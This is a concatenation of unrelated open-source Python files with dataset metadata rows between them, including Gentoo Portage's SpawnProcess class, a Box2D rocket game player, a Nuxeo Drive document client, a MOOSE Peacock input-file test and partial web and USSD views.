from novaideo.content.novaideo_application import NovaIdeoApplication
from novaideo import _
@view_config(
name='creategoogleconnector',
context=NovaIdeoApplication,
renderer='pontus:templates/views_templates/grid.pt',
)
class CreateGoogleConnectorView(FormView):
title = _('Add a Google connector')
schema = select(GoogleConnectorSchema(factory=GoogleConnector, editable=True),
['auth_conf'])
behaviors = [CreateConnector, Cancel]
formid = 'formcreategoogleconnector'
name = 'creategoogleconnector'
css_class = 'panel-transparent'
DEFAULTMAPPING_ACTIONS_VIEWS.update(
{CreateConnector: CreateGoogleConnectorView})
| agpl-3.0 | 4,830,485,414,524,612,000 | 31.459459 | 82 | 0.777685 | false | 3.788644 | false | false | false |
devurandom/portage | pym/_emerge/SpawnProcess.py | 1 | 6588 | # Copyright 1999-2012 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
from _emerge.SubProcess import SubProcess
import sys
from portage.cache.mappings import slot_dict_class
import portage
from portage import _encodings
from portage import _unicode_encode
from portage import os
from portage.const import BASH_BINARY
import fcntl
import errno
import gzip
class SpawnProcess(SubProcess):
"""
Constructor keyword args are passed into portage.process.spawn().
The required "args" keyword argument will be passed as the first
spawn() argument.
"""
_spawn_kwarg_names = ("env", "opt_name", "fd_pipes",
"uid", "gid", "groups", "umask", "logfile",
"path_lookup", "pre_exec")
__slots__ = ("args",) + \
_spawn_kwarg_names + ("_log_file_real", "_selinux_type",)
_file_names = ("log", "process", "stdout")
_files_dict = slot_dict_class(_file_names, prefix="")
def _start(self):
if self.fd_pipes is None:
self.fd_pipes = {}
fd_pipes = self.fd_pipes
self._files = self._files_dict()
files = self._files
master_fd, slave_fd = self._pipe(fd_pipes)
fcntl.fcntl(master_fd, fcntl.F_SETFL,
fcntl.fcntl(master_fd, fcntl.F_GETFL) | os.O_NONBLOCK)
files.process = master_fd
logfile = None
if self._can_log(slave_fd):
logfile = self.logfile
null_input = None
if not self.background or 0 in fd_pipes:
# Subclasses such as AbstractEbuildProcess may have already passed
# in a null file descriptor in fd_pipes, so use that when given.
pass
else:
# TODO: Use job control functions like tcsetpgrp() to control
# access to stdin. Until then, use /dev/null so that any
# attempts to read from stdin will immediately return EOF
# instead of blocking indefinitely.
null_input = os.open('/dev/null', os.O_RDWR)
fd_pipes[0] = null_input
fd_pipes.setdefault(0, sys.__stdin__.fileno())
fd_pipes.setdefault(1, sys.__stdout__.fileno())
fd_pipes.setdefault(2, sys.__stderr__.fileno())
# flush any pending output
stdout_filenos = (sys.__stdout__.fileno(), sys.__stderr__.fileno())
for fd in fd_pipes.values():
if fd in stdout_filenos:
sys.__stdout__.flush()
sys.__stderr__.flush()
break
if logfile is not None:
fd_pipes_orig = fd_pipes.copy()
fd_pipes[1] = slave_fd
fd_pipes[2] = slave_fd
files.log = open(_unicode_encode(logfile,
encoding=_encodings['fs'], errors='strict'), mode='ab')
if logfile.endswith('.gz'):
self._log_file_real = files.log
files.log = gzip.GzipFile(filename='', mode='ab',
fileobj=files.log)
portage.util.apply_secpass_permissions(logfile,
uid=portage.portage_uid, gid=portage.portage_gid,
mode=0o660)
if not self.background:
files.stdout = os.dup(fd_pipes_orig[1])
output_handler = self._output_handler
else:
# Create a dummy pipe so the scheduler can monitor
# the process from inside a poll() loop.
fd_pipes[self._dummy_pipe_fd] = slave_fd
if self.background:
fd_pipes[1] = slave_fd
fd_pipes[2] = slave_fd
output_handler = self._dummy_handler
kwargs = {}
for k in self._spawn_kwarg_names:
v = getattr(self, k)
if v is not None:
kwargs[k] = v
kwargs["fd_pipes"] = fd_pipes
kwargs["returnpid"] = True
kwargs.pop("logfile", None)
self._reg_id = self.scheduler.register(files.process,
self._registered_events, output_handler)
self._registered = True
retval = self._spawn(self.args, **kwargs)
os.close(slave_fd)
if null_input is not None:
os.close(null_input)
if isinstance(retval, int):
# spawn failed
self._unregister()
self._set_returncode((self.pid, retval))
self.wait()
return
self.pid = retval[0]
portage.process.spawned_pids.remove(self.pid)
def _can_log(self, slave_fd):
return True
def _pipe(self, fd_pipes):
"""
@type fd_pipes: dict
@param fd_pipes: pipes from which to copy terminal size if desired.
"""
return os.pipe()
def _spawn(self, args, **kwargs):
spawn_func = portage.process.spawn
if self._selinux_type is not None:
spawn_func = portage.selinux.spawn_wrapper(spawn_func,
self._selinux_type)
# bash is an allowed entrypoint, while most binaries are not
if args[0] != BASH_BINARY:
args = [BASH_BINARY, "-c", "exec \"$@\"", args[0]] + args
return spawn_func(args, **kwargs)
def _output_handler(self, fd, event):
files = self._files
while True:
buf = self._read_buf(fd, event)
if buf is None:
# not a POLLIN event, EAGAIN, etc...
break
if not buf:
# EOF
self._unregister()
self.wait()
break
else:
if not self.background:
write_successful = False
failures = 0
while True:
try:
if not write_successful:
os.write(files.stdout, buf)
write_successful = True
break
except OSError as e:
if e.errno != errno.EAGAIN:
raise
del e
failures += 1
if failures > 50:
# Avoid a potentially infinite loop. In
# most cases, the failure count is zero
# and it's unlikely to exceed 1.
raise
# This means that a subprocess has put an inherited
# stdio file descriptor (typically stdin) into
# O_NONBLOCK mode. This is not acceptable (see bug
# #264435), so revert it. We need to use a loop
# here since there's a race condition due to
# parallel processes being able to change the
# flags on the inherited file descriptor.
# TODO: When possible, avoid having child processes
# inherit stdio file descriptors from portage
# (maybe it can't be avoided with
# PROPERTIES=interactive).
fcntl.fcntl(files.stdout, fcntl.F_SETFL,
fcntl.fcntl(files.stdout,
fcntl.F_GETFL) ^ os.O_NONBLOCK)
files.log.write(buf)
files.log.flush()
self._unregister_if_appropriate(event)
return True
def _dummy_handler(self, fd, event):
"""
This method is mainly interested in detecting EOF, since
the only purpose of the pipe is to allow the scheduler to
monitor the process from inside a poll() loop.
"""
while True:
buf = self._read_buf(fd, event)
if buf is None:
# not a POLLIN event, EAGAIN, etc...
break
if not buf:
# EOF
self._unregister()
self.wait()
break
self._unregister_if_appropriate(event)
return True
def _unregister(self):
super(SpawnProcess, self)._unregister()
if self._log_file_real is not None:
# Avoid "ResourceWarning: unclosed file" since python 3.2.
self._log_file_real.close()
self._log_file_real = None
| gpl-2.0 | -7,758,191,856,039,773,000 | 25.457831 | 69 | 0.656952 | false | 3.181072 | false | false | false |
markusd/rocket | rocket/player.py | 1 | 4137 | import math
import copy
import json
from OpenGL.GL import *
from Box2D import *
from utils.opengl import *
from utils import *
from rocket.object import Missile
class Player():
def __init__(self, keyAdapter, mouse, world, level, position):
self.keyAdapter = keyAdapter
self.world = world
self.level = level
self.mouse = mouse
self.fuel = 500.0
self.possessions = []
self.rockets = 100
self.elapsed_since_rocket = 0
w = 1.0
h = 2.5
self.body = self.world.CreateDynamicBody(
position=position,
userData=self,
fixtures=b2FixtureDef(
#shape=b2PolygonShape(box=(1.0, 1.5)),
shape=b2PolygonShape(vertices=[(-1, -1.5), (1, -1.5), (1, 0), (0, 1.5), (-1, 0)]),
density=1,
angularDamping=50,
friction=5,
#linearDamping=0.1,
)
)
w*=2.5
h*=1.5
self.size = [([0.0, 1.0], [-w*0.5, h*0.5]),
([0.0, 0.0], [-w*0.5, -h*0.5-1]),
([1.0, 0.0], [ w*0.5, -h*0.5-1]),
([1.0, 1.0], [ w*0.5, h*0.5])]
self.wasRotating = False
def update(self, dt):
pressed = lambda x: x in self.keyAdapter.pressed
self.elapsed_since_rocket += dt
if pressed("right") or pressed("d"):
if abs(self.body.angularVelocity) <= 3.0:
self.body.ApplyAngularImpulse(-5.0, True)
self.wasRotating = True
elif pressed("left") or pressed("a"):
if abs(self.body.angularVelocity) <= 3.0:
self.body.ApplyAngularImpulse(5.0, True)
self.wasRotating = True
elif self.wasRotating:
self.body.angularVelocity = 0
self.wasRotating = False
if self.fuel > 0.0 and (pressed("up") or pressed("w")):
if pressed("shift"):
f = self.body.GetWorldVector(localVector=(0.0, 500.0*0.5))
self.fuel -= 3 * dt
else:
f = self.body.GetWorldVector(localVector=(0.0, 100.0*0.5))
self.fuel -= 1 * dt
p = self.body.GetWorldPoint(localPoint=(0.0, 0.0))
self.body.ApplyForce(f, p, True)
self.fuel = max(0.0, self.fuel)
if pressed(" ") and self.elapsed_since_rocket > 1.0 and self.rockets > 0:
self.rockets -= 1
self.elapsed_since_rocket = 0
position = self.body.transform.position
#dir = Vec2d(0.0, 1.0)
#dir.rotate(self.body.transform.angle * 180.0/3.14)
#dir = b2Vec2(dir.x, dir.y)
target = self.mouse["wpos"]()
target = b2Vec2(target[0], target[1])
dir = target - position
dir.Normalize()
position = position + dir * 3
missile = Missile.launch(world=self.world, target=None, position=position, velocity=dir * 50)
self.level.objects.append(missile)
def render(self):
pressed = lambda x: x in self.keyAdapter.pressed
texture = "textures/rocket-idle"
if pressed("up") or pressed("left") or pressed("right") or pressed("a") or pressed("w") or pressed("d"):
texture = "textures/rocket"
if pressed("shift"):
texture = "textures/rocket-afterburner"
glColor3f(1.0, 1.0, 1.0)
TextureManager.instance()[texture].bind()
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glEnable(GL_TEXTURE_2D)
glPushMatrix()
glTranslatef(self.body.transform.position.x, self.body.transform.position.y, 0.0)
glRotatef(self.body.transform.angle * 180.0/3.14, 0.0, 0.0, 1.0)
glBegin(GL_QUADS)
for v in self.size:
glTexCoord2fv(v[0]) ; glVertex2fv(v[1])
glEnd()
glPopMatrix()
glDisable(GL_TEXTURE_2D)
| bsd-2-clause | 4,728,756,581,301,402,000 | 32.918033 | 112 | 0.510273 | false | 3.427506 | false | false | false |
jstoja/TsinghuaMailSystem | src/com/mailsystem/services/AddressService.py | 1 | 1110 | '''
Created on 8 juin 2014
@author: Romain
'''
from src.com.mailsystem.orm import Address
class AddressService:
@staticmethod
def listAll(db_users):
s = db_users.session()
ret = s.query(Address).all()
s.close()
return ret
@staticmethod
def selectById(db_users, idadd):
s = db_users.session()
ret = s.query(Address).get(idadd)
s.close()
return ret
@staticmethod
def add(db_users, name):
insertStatement = db_users.statement(Address, "insert")\
.values(name = name)
result = db_users.execute(insertStatement)
if result is not None:
return result.inserted_primary_key[0]
return -1
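    # Example usage (a sketch; ``db_users`` is assumed to be the project's
    # database connector exposing session(), statement() and execute()):
    #
    #   idadd = AddressService.add(db_users, 'Tsinghua, Beijing')
    #   if idadd != -1:
    #       AddressService.update(db_users, idadd, 'Tsinghua University')
    #       print AddressService.selectById(db_users, idadd)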
@staticmethod
def update(db_users, idadd, name):
updateStatement = db_users.statement(Address, "update")\
.where(Address.__table__.c.idaddress == idadd)\
.values(name = name)
        result = db_users.execute(updateStatement)
        return result is not None
| mit | -988,518,705,082,188,700 | 27.487179 | 83 | 0.552252 | false | 4.157303 | false | false | false |
ssdi-drive/nuxeo-drive | nuxeo-drive-client/nxdrive/client/remote_document_client.py | 1 | 19921 | # coding: utf-8
""" API to access remote Nuxeo documents for synchronization. """
import os
import unicodedata
import urllib2
from collections import namedtuple
from datetime import datetime
from dateutil import parser
from nxdrive.client.base_automation_client import BaseAutomationClient
from nxdrive.client.common import NotFound, safe_filename
from nxdrive.logging_config import get_logger
from nxdrive.options import Options
log = get_logger(__name__)
# Make the following an optional binding configuration
FILE_TYPE = 'File'
FOLDER_TYPE = 'Folder'
DEFAULT_TYPES = ('File', 'Note', 'Workspace', 'Folder')
MAX_CHILDREN = 1000
# Data transfer objects
BaseNuxeoDocumentInfo = namedtuple('NuxeoDocumentInfo', [
'root', # ref of the document that serves as sync root
'name', # title of the document (not guaranteed to be locally unique)
'uid', # ref of the document
'parent_uid', # ref of the parent document
'path', # remote path (useful for ordering)
'folderish', # True is can host child documents
'last_modification_time', # last update time
'last_contributor', # last contributor
'digest_algorithm', # digest algorithm of the document's blob
'digest', # digest of the document's blob
'repository', # server repository name
'doc_type', # Nuxeo document type
'version', # Nuxeo version
'state', # Nuxeo lifecycle state
'has_blob', # If this doc has blob
'filename', # Filename of document
'lock_owner', # lock owner
'lock_created', # lock creation time
'permissions', # permissions
])
class NuxeoDocumentInfo(BaseNuxeoDocumentInfo):
"""Data Transfer Object for doc info on the Remote Nuxeo repository"""
# Consistency with the local client API
def get_digest(self):
return self.digest
class RemoteDocumentClient(BaseAutomationClient):
"""Nuxeo document oriented Automation client
    Uses the standard Automation document API. Deprecated in Nuxeo Drive,
    which now uses the FileSystemItem API.
Kept here for tests and later extraction of a generic API.
"""
# Override constructor to initialize base folder
# which is specific to RemoteDocumentClient
def __init__(self, server_url, user_id, device_id, client_version,
proxies=None, proxy_exceptions=None,
password=None, token=None, repository=Options.remote_repo,
base_folder=None, timeout=20, blob_timeout=None,
cookie_jar=None, upload_tmp_dir=None, check_suspended=None):
super(RemoteDocumentClient, self).__init__(
server_url, user_id, device_id, client_version,
proxies=proxies, proxy_exceptions=proxy_exceptions,
password=password, token=token, repository=repository,
timeout=timeout, blob_timeout=blob_timeout,
cookie_jar=cookie_jar, upload_tmp_dir=upload_tmp_dir,
check_suspended=check_suspended)
# fetch the root folder ref
self.set_base_folder(base_folder)
def set_base_folder(self, base_folder):
if base_folder is not None:
base_folder_doc = self.fetch(base_folder)
self._base_folder_ref = base_folder_doc['uid']
self._base_folder_path = base_folder_doc['path']
else:
self._base_folder_ref, self._base_folder_path = None, None
#
# API common with the local client API
#
def get_info(self, ref, raise_if_missing=True, fetch_parent_uid=True,
use_trash=True, include_versions=False):
if not self.exists(ref, use_trash=use_trash,
include_versions=include_versions):
if raise_if_missing:
raise NotFound("Could not find '%s' on '%s'" % (
self._check_ref(ref), self.server_url))
return None
return self.doc_to_info(self.fetch(self._check_ref(ref)),
fetch_parent_uid=fetch_parent_uid)
def get_content(self, ref):
"""
Download and return the binary content of a document
Beware that the content is loaded in memory.
"""
if not isinstance(ref, NuxeoDocumentInfo):
ref = self._check_ref(ref)
return self.get_blob(ref)
# TODO: allow getting content by streaming the response to an output file
# See RemoteFileSystemClient.stream_content
def get_children_info(self, ref, types=DEFAULT_TYPES, limit=MAX_CHILDREN):
ref = self._check_ref(ref)
query = (
"SELECT * FROM Document"
" WHERE ecm:parentId = '%s'"
" AND ecm:primaryType IN ('%s')"
" AND ecm:currentLifeCycleState != 'deleted'"
" AND ecm:isCheckedInVersion = 0"
" ORDER BY dc:title, dc:created LIMIT %d"
) % (ref, "', '".join(types), limit)
entries = self.query(query)[u'entries']
if len(entries) == MAX_CHILDREN:
# TODO: how to best handle this case? A warning and return an empty
# list, a dedicated exception?
raise RuntimeError("Folder %r on server %r has more than the"
"maximum number of children: %d" % (
ref, self.server_url, MAX_CHILDREN))
return self._filtered_results(entries)
def make_folder(self, parent, name, doc_type=FOLDER_TYPE):
# TODO: make it possible to configure context dependent:
# - SocialFolder under SocialFolder or SocialWorkspace
# - Folder under Folder or Workspace
# This configuration should be provided by a special operation on the
# server.
parent = self._check_ref(parent)
doc = self.create(parent, doc_type, name=name,
properties={'dc:title': name})
return doc[u'uid']
def make_file(self, parent, name, content=None, doc_type=FILE_TYPE):
"""Create a document of the given type with the given name and content
Creates a temporary file from the content then streams it.
"""
parent = self._check_ref(parent)
properties = {'dc:title': name}
        if doc_type == 'Note' and content is not None:
properties['note:note'] = content
doc = self.create(parent, doc_type, name=name, properties=properties)
ref = doc[u'uid']
        if doc_type != 'Note' and content is not None:
self.attach_blob(ref, content, name)
return ref
def stream_file(self, parent, name, file_path, filename=None,
mime_type=None, doc_type=FILE_TYPE):
"""Create a document by streaming the file with the given path"""
ref = self.make_file(parent, name, doc_type=doc_type)
self.execute_with_blob_streaming("Blob.Attach", file_path,
filename=filename, document=ref,
mime_type=mime_type)
return ref
def update_content(self, ref, content, filename=None):
"""Update a document with the given content
Creates a temporary file from the content then streams it.
"""
if filename is None:
filename = self.get_info(ref).name
self.attach_blob(self._check_ref(ref), content, filename)
def stream_update(
self,
ref,
file_path,
filename=None,
mime_type=None,
apply_versioning_policy=False,
):
"""Update a document by streaming the file with the given path"""
ref = self._check_ref(ref)
op_name = ('NuxeoDrive.AttachBlob'
if self.is_nuxeo_drive_attach_blob()
else 'Blob.Attach')
params = {'document': ref}
if self.is_nuxeo_drive_attach_blob():
params.update({'applyVersioningPolicy': apply_versioning_policy})
self.execute_with_blob_streaming(
op_name, file_path, filename=filename, mime_type=mime_type, **params)
def delete(self, ref, use_trash=True):
op_input = "doc:" + self._check_ref(ref)
if use_trash:
try:
return self.execute("Document.SetLifeCycle", op_input=op_input,
value='delete')
except urllib2.HTTPError as e:
if e.code == 500:
return self.execute("Document.Delete", op_input=op_input)
raise
else:
return self.execute("Document.Delete", op_input=op_input)
def undelete(self, ref):
op_input = "doc:" + self._check_ref(ref)
return self.execute("Document.SetLifeCycle", op_input=op_input,
value='undelete')
def delete_content(self, ref, xpath=None):
return self.delete_blob(self._check_ref(ref), xpath=xpath)
def exists(self, ref, use_trash=True, include_versions=False):
# type: (unicode, bool, bool) -> bool
"""
Check if a document exists on the server.
:param ref: Document reference (UID).
:param use_trash: Filter documents inside the trash.
        :param include_versions: Also match documents that are checked-in versions.
:rtype: bool
"""
ref = self._check_ref(ref)
id_prop = 'ecm:path' if ref.startswith('/') else 'ecm:uuid'
        if use_trash:
            lifecycle_pred = "AND ecm:currentLifeCycleState != 'deleted'"
        else:
            lifecycle_pred = ""
        if include_versions:
            version_pred = ""
        else:
            version_pred = "AND ecm:isCheckedInVersion = 0"
        query = ("SELECT * FROM Document WHERE %s = '%s' %s %s"
                 " LIMIT 1") % (
            id_prop, ref, lifecycle_pred, version_pred)
results = self.query(query)
return len(results[u'entries']) == 1
def check_writable(self, ref):
# TODO: which operation can be used to perform a permission check?
return True
def _check_ref(self, ref):
if ref.startswith('/') and self._base_folder_path is not None:
# This is a path ref (else an id ref)
if self._base_folder_path.endswith('/'):
ref = self._base_folder_path + ref[1:]
else:
ref = self._base_folder_path + ref
return ref
def doc_to_info(self, doc, fetch_parent_uid=True, parent_uid=None):
"""Convert Automation document description to NuxeoDocumentInfo"""
props = doc['properties']
name = props['dc:title']
filename = None
folderish = 'Folderish' in doc['facets']
try:
last_update = datetime.strptime(doc['lastModified'],
"%Y-%m-%dT%H:%M:%S.%fZ")
except ValueError:
# no millisecond?
last_update = datetime.strptime(doc['lastModified'],
"%Y-%m-%dT%H:%M:%SZ")
last_contributor = props['dc:lastContributor']
# TODO: support other main files
has_blob = False
if folderish:
digest_algorithm = None
digest = None
else:
blob = props.get('file:content')
if blob is None:
note = props.get('note:note')
if note is None:
digest_algorithm = None
digest = None
else:
import hashlib
m = hashlib.md5()
m.update(note.encode('utf-8'))
digest = m.hexdigest()
digest_algorithm = 'md5'
ext = '.txt'
mime_type = props.get('note:mime_type')
if mime_type == 'text/html':
ext = '.html'
elif mime_type == 'text/xml':
ext = '.xml'
elif mime_type == 'text/x-web-markdown':
ext = '.md'
if not name.endswith(ext):
filename = name + ext
else:
filename = name
else:
has_blob = True
digest_algorithm = blob.get('digestAlgorithm')
if digest_algorithm is not None:
digest_algorithm = digest_algorithm.lower().replace('-', '')
digest = blob.get('digest')
filename = blob.get('name')
# Lock info
lock_owner = doc.get('lockOwner')
lock_created = doc.get('lockCreated')
if lock_created is not None:
lock_created = parser.parse(lock_created)
# Permissions
permissions = doc.get('contextParameters', {}).get('permissions', None)
# XXX: we need another roundtrip just to fetch the parent uid...
if parent_uid is None and fetch_parent_uid:
parent_uid = self.fetch(os.path.dirname(doc['path']))['uid']
# Normalize using NFC to make the tests more intuitive
if 'uid:major_version' in props and 'uid:minor_version' in props:
version = str(props['uid:major_version']) + '.' + str(props['uid:minor_version'])
else:
version = None
if name is not None:
name = unicodedata.normalize('NFC', name)
return NuxeoDocumentInfo(
self._base_folder_ref, name, doc['uid'], parent_uid,
doc['path'], folderish, last_update, last_contributor,
digest_algorithm, digest, self.repository, doc['type'],
version, doc['state'], has_blob, filename,
lock_owner, lock_created, permissions)
def _filtered_results(self, entries, fetch_parent_uid=True,
parent_uid=None):
# Filter out filenames that would be ignored by the file system client
# so as to be consistent.
filtered = []
for info in [self.doc_to_info(d, fetch_parent_uid=fetch_parent_uid,
parent_uid=parent_uid)
for d in entries]:
name = info.name.lower()
if (name.endswith(Options.ignored_suffixes)
or name.startswith(Options.ignored_prefixes)):
continue
filtered.append(info)
return filtered
#
# Generic Automation features reused from nuxeolib
#
# Document category
def create(self, ref, doc_type, name=None, properties=None):
name = safe_filename(name)
return self.execute("Document.Create", op_input="doc:" + ref,
type=doc_type, name=name, properties=properties)
def update(self, ref, properties=None):
return self.execute("Document.Update", op_input="doc:" + ref,
properties=properties)
def set_property(self, ref, xpath, value):
return self.execute("Document.SetProperty", op_input="doc:" + ref,
xpath=xpath, value=value)
def get_children(self, ref):
return self.execute("Document.GetChildren", op_input="doc:" + ref)
def get_parent(self, ref):
return self.execute("Document.GetParent", op_input="doc:" + ref)
def is_locked(self, ref):
data = self.fetch(ref, extra_headers={'fetch-document': 'lock'})
return 'lockCreated' in data
def lock(self, ref):
return self.execute("Document.Lock", op_input="doc:" + self._check_ref(ref))
def unlock(self, ref):
return self.execute("Document.Unlock", op_input="doc:" + self._check_ref(ref))
def create_user(self, user_name, **kwargs):
return self.execute('User.CreateOrUpdate', username=user_name, **kwargs)
def move(self, ref, target, name=None):
return self.execute("Document.Move",
op_input="doc:" + self._check_ref(ref),
target=self._check_ref(target), name=name)
def copy(self, ref, target, name=None):
return self.execute("Document.Copy",
op_input="doc:" + self._check_ref(ref),
target=self._check_ref(target), name=name)
def create_version(self, ref, increment='None'):
doc = self.execute("Document.CreateVersion",
op_input="doc:" + self._check_ref(ref),
increment=increment)
return doc['uid']
def get_versions(self, ref):
extra_headers = {'X-NXfetch.document': 'versionLabel'}
versions = self.execute(
'Document.GetVersions',
op_input='doc:' + self._check_ref(ref),
extra_headers=extra_headers)
return [(v['uid'], v['versionLabel']) for v in versions['entries']]
def restore_version(self, version):
doc = self.execute("Document.RestoreVersion",
op_input="doc:" + self._check_ref(version))
return doc['uid']
def block_inheritance(self, ref, overwrite=True):
op_input = "doc:" + self._check_ref(ref)
self.execute("Document.SetACE",
op_input=op_input,
user="Administrator",
permission="Everything",
overwrite=overwrite)
self.execute("Document.SetACE",
op_input=op_input,
user="Everyone",
permission="Everything",
grant="false",
overwrite=False)
# These ones are special: no 'op_input' parameter
def fetch(self, ref, **kwargs):
try:
return self.execute("Document.Fetch", value=ref, **kwargs)
except urllib2.HTTPError as e:
if e.code == 404:
raise NotFound("Failed to fetch document %r on server %r" % (
ref, self.server_url))
            raise
def query(self, query, language=None):
return self.execute("Document.Query", query=query, language=language)
# Blob category
def get_blob(self, ref, file_out=None):
if isinstance(ref, NuxeoDocumentInfo):
doc_id = ref.uid
if not ref.has_blob and ref.doc_type == "Note":
doc = self.fetch(doc_id)
content = doc['properties'].get('note:note')
if file_out is not None and content is not None:
with open(file_out, 'wb') as f:
f.write(content.encode('utf-8'))
return content
else:
doc_id = ref
return self.execute("Blob.Get", op_input="doc:" + doc_id,
timeout=self.blob_timeout, file_out=file_out)
def attach_blob(self, ref, blob, filename):
file_path = self.make_tmp_file(blob)
try:
return self.execute_with_blob_streaming(
'Blob.Attach', file_path, filename=filename, document=ref)
finally:
os.remove(file_path)
def delete_blob(self, ref, xpath=None):
return self.execute("Blob.Remove", op_input="doc:" + ref, xpath=xpath)
def log_on_server(self, message, level='WARN'):
""" Log the current test server side. Helpful for debugging. """
return self.execute('Log', message=message, level=level.lower())
#
# Nuxeo Drive specific operations
#
def get_roots(self):
entries = self.execute('NuxeoDrive.GetRoots')['entries']
return self._filtered_results(entries, fetch_parent_uid=False)
def get_update_info(self):
return self.execute('NuxeoDrive.GetClientUpdateInfo')
def register_as_root(self, ref):
self.execute(
'NuxeoDrive.SetSynchronization',
op_input='doc:' + self._check_ref(ref),
enable=True)
return True
def unregister_as_root(self, ref):
self.execute(
'NuxeoDrive.SetSynchronization',
op_input='doc:' + self._check_ref(ref),
enable=False)
return True
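# Rough usage sketch (server URL, credentials and paths below are placeholders,
# not part of this module):
#
#   client = RemoteDocumentClient('http://localhost:8080/nuxeo', 'Administrator',
#                                 'device-1', '1.0', password='secret',
#                                 base_folder='/default-domain/workspaces')
#   folder_ref = client.make_folder('/', 'Sync Folder')
#   client.register_as_root(folder_ref)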
| lgpl-2.1 | 4,518,358,538,497,191,000 | 37.606589 | 93 | 0.571809 | false | 4.103193 | false | false | false |
vardis/pano | src/pano/actions/GameActions.py | 1 | 2254 | '''
Copyright (c) 2008 Georgios Giannoudovardis, <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
import logging
from pano.actions import builtinActions
class GameActions:
def __init__(self, game):
self.log = logging.getLogger('pano.actions')
self.game = game
self.actions = { }
builtinActions.registerBultins(self)
def getAction(self, name):
return self.actions[name]
def registerAction(self, action):
self.actions[action.getName()] = action
def unregisterAction(self, name):
del self.actions[name]
def execute(self, name, *params):
self.log.debug('executing action %s' % name)
try:
act = self.actions[name]
if act is not None:
act.execute(self.game, params)
        except Exception:
self.log.exception('unexpected error')
def isAction(self, name):
"""
Returns True if the given name corresponds to a known and registered action.
"""
        return name in self.actions
def builtinNames(self):
return builtinActions.BuiltinActionsNames
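# Minimal usage sketch (``game`` and the action name are assumptions; real
# names come from the registered Action objects and the builtins):
#
#   actions = GameActions(game)
#   if actions.isAction('exit'):
#       actions.execute('exit')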
| mit | 4,303,235,491,351,281,000 | 33.809524 | 84 | 0.669476 | false | 4.428291 | false | false | false |
nuclear-wizard/moose | python/peacock/tests/input_tab/InputFile/test_InputFile.py | 12 | 2790 | #!/usr/bin/env python3
#* This file is part of the MOOSE framework
#* https://www.mooseframework.org
#*
#* All rights reserved, see COPYRIGHT for full restrictions
#* https://github.com/idaholab/moose/blob/master/COPYRIGHT
#*
#* Licensed under LGPL 2.1, please see LICENSE for details
#* https://www.gnu.org/licenses/lgpl-2.1.html
from peacock.Input.InputFile import InputFile
from peacock.utils import Testing
from peacock import PeacockException
from PyQt5 import QtWidgets
from pyhit import hit
class Tests(Testing.PeacockTester):
qapp = QtWidgets.QApplication([])
def setUp(self):
super(Tests, self).setUp()
self.tmp_file = "tmp_input.i"
self.tmp_bad_file = "tmp_input"
self.basic_input = "[foo]\n[./bar]\ntype = bar\nother = 'bar'[../]\n[./foobar]\nactive = 'bar'\n[../]\n[]\n"
def tearDown(self):
Testing.remove_file(self.tmp_file)
Testing.remove_file(self.tmp_bad_file)
def writeFile(self, s, fname):
with open(fname, "w") as f:
f.write(s)
def testFailures(self):
input_file = InputFile()
with self.assertRaises(PeacockException.PeacockException):
input_file.openInputFile("/no_exist")
with self.assertRaises(PeacockException.PeacockException):
input_file.openInputFile("/")
with self.assertRaises(PeacockException.PeacockException):
self.writeFile(self.basic_input, self.tmp_bad_file)
input_file.openInputFile(self.tmp_bad_file)
with self.assertRaises(PeacockException.PeacockException):
# simulate a duplicate section in the input file
# which should throw an exception
self.writeFile(self.basic_input*2, self.tmp_file)
input_file.openInputFile(self.tmp_file)
def testSuccess(self):
self.writeFile(self.basic_input, self.tmp_file)
input_file = InputFile(self.tmp_file)
self.assertNotEqual(input_file.root_node, None)
self.assertEqual(input_file.changed, False)
children = [ c for c in input_file.root_node.children(node_type=hit.NodeType.Section) ]
self.assertEqual(len(children), 1)
top = children[0]
self.assertEqual(top.path(), "foo")
children = [ c for c in top.children(node_type=hit.NodeType.Section) ]
self.assertEqual(len(children), 2)
c0 = children[0]
self.assertEqual(c0.path(), "bar")
params = [ c for c in c0.children(node_type=hit.NodeType.Field) ]
self.assertEqual(len(params), 2)
c1 = children[1]
self.assertEqual(c1.path(), "foobar")
params = [ c for c in c1.children(node_type=hit.NodeType.Field) ]
self.assertEqual(len(params), 1)
if __name__ == '__main__':
Testing.run_tests()
| lgpl-2.1 | -5,546,552,538,365,725,000 | 38.295775 | 116 | 0.651254 | false | 3.414933 | true | false | false |
unicefuganda/mics | survey/ussd/ussd_register_household.py | 1 | 11204 | from calendar import monthrange
import datetime
from django.core.exceptions import ObjectDoesNotExist
from survey.models import Question, HouseholdHead, UnknownDOBAttribute
from survey.models.households import HouseholdMember
from survey.ussd.ussd import USSD
class USSDRegisterHousehold(USSD):
HEAD_ANSWER = {
'HEAD': '1',
'MEMBER': '2'
}
REGISTRATION_DICT = {}
UNKNOWN = 99
def __init__(self, investigator, request):
super(USSDRegisterHousehold, self).__init__(investigator, request)
self.question = None
self.household_member = None
self.is_head = None
self.is_selecting_member = False
self.set_question()
self.set_form_in_cache()
self.set_household_member()
self.set_head_in_cache()
self.set_is_selecting_member()
def set_question(self):
try:
question = self.get_from_session('QUESTION')
if question:
self.question = question
except KeyError:
pass
def set_form_in_cache(self):
try:
if not self.investigator.get_from_cache('registration_dict'):
self.investigator.set_in_cache('registration_dict', self.REGISTRATION_DICT)
else:
self.REGISTRATION_DICT = self.investigator.get_from_cache('registration_dict')
except KeyError:
pass
def set_head_in_cache(self):
try:
is_head = self.investigator.get_from_cache('is_head')
if is_head is not None:
